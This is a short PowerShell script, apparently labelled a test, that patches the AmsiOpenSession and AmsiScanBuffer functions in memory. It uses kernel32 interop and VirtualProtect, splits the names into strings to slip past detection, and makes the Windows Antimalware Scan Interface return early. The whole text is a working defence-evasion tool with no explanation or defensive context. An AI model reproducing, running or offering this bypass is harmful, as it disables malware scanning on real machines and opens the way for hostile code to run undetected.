test/UTF4

$W = @"
using System;using System.Runtime.InteropServices;
public class W {
    [DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $W

$L = [W]::LoadLibrary("am" + "si.dll")
$AmsiOpenSession = [W]::GetProcAddress($L, "Amsi" + "Open" + "Session")
$AmsiScanBuffer = [W]::GetProcAddress($L, "Amsi" + "Scan" + "Buffer")

function ChangeMemoryProtection($address, $size, $protection) {
    $oldProtect = 0
    [W]::VirtualProtect($address, [uint32]$size, $protection, [ref]$oldProtect) | Out-Null
}

$NopCode = [Byte[]](0x48, 0x31, 0xC0)
$PatchCode = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

ChangeMemoryProtection $AmsiOpenSession 3 0x40
[System.Runtime.InteropServices.Marshal]::Copy($NopCode, 0, $AmsiOpenSession, 3)
ChangeMemoryProtection $AmsiOpenSession 3 0x20

ChangeMemoryProtection $AmsiScanBuffer 6 0x40
[System.Runtime.InteropServices.Marshal]::Copy($PatchCode, 0, $AmsiScanBuffer, 6)
ChangeMemoryProtection $AmsiScanBuffer 6 0x20